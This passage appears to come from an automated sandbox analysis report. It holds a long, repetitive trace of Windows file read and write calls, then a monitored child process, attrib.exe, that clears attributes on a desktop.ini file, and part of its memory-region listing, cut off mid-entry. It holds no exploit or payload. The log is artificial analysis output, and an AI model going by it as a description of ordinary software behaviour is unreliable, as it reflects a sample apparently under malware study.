[0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.912] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.912] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: 
lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.913] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.913] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0143.914] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.914] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.914] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 
[0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0143.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.915] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.917] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.917] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType 
(hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.918] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x32, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x32, lpOverlapped=0x0) returned 1 [0143.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.919] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.919] _close (_FileHandle=4) returned 0 [0143.919] FindNextFileW (in: hFindFile=0xf0ea0, lpFindFileData=0x2ef5d4 | out: 
lpFindFileData=0x2ef5d4) returned 0 [0143.919] GetLastError () returned 0x12 [0143.919] FindClose (in: hFindFile=0xf0ea0 | out: hFindFile=0xf0ea0) returned 1 [0143.919] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0143.920] _close (_FileHandle=3) returned 0 [0143.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.920] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.920] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.921] SetConsoleInputExeNameW () returned 0x1 [0143.921] GetConsoleOutputCP () returned 0x1b5 [0143.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.921] exit (_Code=0) Process: id = "191" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "187" os_parent_pid = "0xfdc" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16900 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16901 start_va = 
0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16902 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16903 start_va = 0x110000 end_va = 0x116fff entry_point = 0x110000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16904 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 16905 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16906 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16907 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16908 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 16909 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16910 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16911 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16912 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = 
"locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16913 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 16914 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 16915 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16916 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16917 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16918 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16919 start_va = 0x76910000 end_va = 